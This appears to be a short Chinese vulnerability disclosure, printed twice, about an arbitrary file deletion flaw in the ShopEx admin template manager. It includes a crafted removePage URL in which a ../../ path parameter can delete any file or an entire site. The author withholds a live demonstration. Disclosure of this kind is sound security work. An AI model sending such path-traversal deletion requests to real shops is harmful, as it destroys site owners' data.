VULHUB ™

### 简要描述： 白帽走遍天下。侠义常留心中。 ### 详细说明： 这个漏洞同样出在模板管理处。。 删除模板的地方可以 构造url 即可删除任意文件 包括整站删除都是可以的。。 构造如下： http://shop-xxxxxx.shopex.fenxiaowang.com/shopadmin/index.php#ctl=system/template&act=removePage&p[0]=此地方填要删除的目录 可以为../../ 即可删除整站 同样 这个漏洞存在于 易开店 等其他shopex系统中。。。 ### 漏洞证明： 此漏洞具有比较大的危害性，会对官方网站造成破坏。故不做操作演示。。

### 简要描述： 白帽走遍天下。侠义常留心中。 ### 详细说明： 这个漏洞同样出在模板管理处。。 删除模板的地方可以 构造url 即可删除任意文件 包括整站删除都是可以的。。 构造如下： http://shop-xxxxxx.shopex.fenxiaowang.com/shopadmin/index.php#ctl=system/template&act=removePage&p[0]=此地方填要删除的目录 可以为../../ 即可删除整站 同样 这个漏洞存在于 易开店 等其他shopex系统中。。。 ### 漏洞证明： 此漏洞具有比较大的危害性，会对官方网站造成破坏。故不做操作演示。。